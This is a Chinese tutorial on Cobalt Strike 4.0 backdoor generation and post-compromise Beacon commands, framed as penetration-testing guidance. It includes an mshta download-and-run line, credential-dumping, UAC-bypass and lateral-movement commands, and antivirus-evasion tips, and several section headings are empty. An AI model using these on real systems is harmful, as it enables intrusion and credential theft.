Cobalt Strike 4.0 后门生成与主机上线操作指南

Get-ExecutionPolicy
Set-ExecutionPolicy UnRestricted

elevate        # 使用exp提权
getsystem      # 尝试获取SYSTEM权限
bypassuac      # 绕过UAC

hashdump               # 转储密码哈希
logonpasswords         # 转储凭据和哈希
make_token DOMAIN\user password  # 创建令牌
kerberos_ccache_use /path/to/file.ccache  # 导入票据

psexec target cmd      # 使用psexec
winrm target cmd       # 使用WinRM
wmi target cmd         # 使用WMI

ps                     # 列出进程
inject pid listener    # 注入进程
kill pid               # 结束进程

upload /local/path /remote/path  # 上传文件
download /remote/path           # 下载文件
ls                              # 列出文件

portscan target ports  # 端口扫描
rportfwd local_port remote_host remote_port  # 端口转发
socks 1080            # 启动SOCKS代理

Cobalt Strike 4.0 后门生成与主机上线操作指南 一、后门生成方式 1. HTML Application (HTA木马文件) 生成路径 ：Attacks → Packages → HTML Application 三种工作方式 ： Executable ：生成可执行攻击脚本 PowerShell ：生成PowerShell脚本 VBA ：生成VBA脚本（使用mshta命令执行） 使用方法 ： 生成PowerShell脚本 复制生成的URL（如： http://x.x.x.x:8008/download/file.ext ） 在受害者机器上执行： mshta http://x.x.x.x:8008/download/file.ext 2. MS Office Macro (Office宏病毒文件) 生成路径 ：Attacks → Packages → MS Office Macro 特点 ： 生成Microsoft Office宏文件 提供将宏嵌入Word或Excel的说明 3. Payload Generator (多种语言payload) 生成路径 ：Attacks → Packages → Payload Generator 支持的格式 ： C、C#、Python、Java、Perl PowerShell脚本、PowerShell命令 Ruby、Raw格式 免杀框架Veli中的shellcode等 常用方法 ： PowerShell Command：生成一串命令，在主机上执行即可上线 4. Windows Executable (可执行exe木马) 生成路径 ：Attacks → Packages → Windows Executable 选项 ： Windows Service EXE ：可作为Windows服务调用的可执行文件 Windows DLL (32-bit) ：x86 Windows DLL Windows DLL (64-bit) ：x64 Windows DLL 签名选项 ：可使用代码签名证书签名EXE或DLL 使用方法 ： 直接运行生成的exe文件（需确认目标系统架构） 5. Windows Executable(s) (无状态可执行exe木马) 生成路径 ：Attacks → Packages → Windows Executable(s) 特点 ： 直接导出Beacon（不使用stager） 可导出为PowerShell脚本或raw格式 PowerShell执行问题解决 ： 二、主机上线后基础操作 右键菜单功能 Interact ：进入操作命令界面 Access ： Dump Hashes：获取hash Elevate：提权 Golden Ticket：生成黄金票据 Make token：凭证转换 Run Mimikatz：运行Mimikatz Spawn As：用其他用户生成侦听器 Explore ： Browser Pivot：劫持浏览器进程 Desktop(VNC)：桌面交互 File Browser：文件浏览器 Net View：执行Net View命令 Port Scan：端口扫描 Process List：进程列表 Screenshot：截图 Pivoting ： SOCKS Server：代理服务 Listener：反向端口转发 Deploy VPN：部署VPN Spawn ：外部监听器（如指派给MSF） Session Note ： Color：标注颜色 Remove：删除 Sleep：设置回传间隔（默认60秒） Exit：退出 Beacon交互命令 | 命令 | 功能描述 | |------|----------| | argue | 进程参数欺骗 | | blockdlls | 阻止子进程加载非Microsoft DLL | | browserpivot | 注入受害者浏览器进程 | | bypassuac | 绕过UAC提升权限 | | cd | 切换目录 | | checkin | 强制让被控端回连 | | clear | 清除beacon内部任务队列 | | connect | 通过TCP连接到Beacon peer | | covertvpn | 部署Covert VPN客户端 | | cp | 复制文件 | | dcsync | 从DC中提取密码哈希 | | desktop | 远程桌面(VNC) | | dllinject | 反射DLL注入进程 | | download | 下载文件 | | drives | 列出目标盘符 | | elevate | 使用exp提权 | | execute | 执行程序(无输出) | | execute-assembly | 内存中执行.NET程序 | | exit | 终止beacon会话 | | getprivs | 启用当前令牌的系统权限 | | getsystem | 尝试获取SYSTEM权限 | | getuid | 获取用户ID | | hashdump | 转储密码哈希值 | | inject | 注入进程生成会话 | | jobs | 列出后台任务 | | kerberos_ ccache_ use | 从ccache文件导入票据 | | keylogger | 键盘记录 | | kill | 结束进程 | | logonpasswords | 使用mimikatz转储凭据和哈希 | | ls | 列出文件 | | make_ token | 创建令牌传递凭据 | | mimikatz | 运行mimikatz | | mkdir | 创建目录 | | net | 执行net命令 | | portscan | 端口扫描 | | powerpick | 通过Unmanaged PowerShell执行命令 | | powershell | 通过powershell.exe执行命令 | | psexec | 使用服务在主机上生成会话 | | pth | 使用Mimikatz进行传递哈希 | | pwd | 显示当前目录 | | reg | 查询注册表 | | rev2self | 恢复原始令牌 | | rm | 删除文件或文件夹 | | rportfwd | 端口转发 | | run | 执行程序(返回输出) | | runas | 以其他用户权限执行程序 | | screenshot | 屏幕截图 | | setenv | 设置环境变量 | | shell | 执行cmd命令 | | sleep | 设置睡眠延迟时间 | | socks | 启动SOCKS4代理 | | spawn | 生成会话 | | steal_ token | 从进程中窃取令牌 | | timestomp | 复制文件时间戳 | | upload | 上传文件 | | wdigest | 使用mimikatz转储明文凭据 | | winrm | 使用WinRM横向渗透 | | wmi | 使用WMI横向渗透 | 三、关键操作详解 1. 提权操作 2. 凭证操作 3. 横向移动 4. 进程操作 5. 文件操作 6. 网络操作 四、注意事项 Sleep时间设置 ：实际中频率不宜过快，容易被发现 PowerShell执行策略 ：可能需要设置为UnRestricted 系统架构 ：生成payload前确认目标系统是x86还是x64 免杀考虑 ：可根据需要选择不同生成方式绕过AV检测 权限要求 ：部分操作需要管理员权限 通过掌握这些后门生成方式和上线后操作命令，可以有效地进行渗透测试和安全评估工作。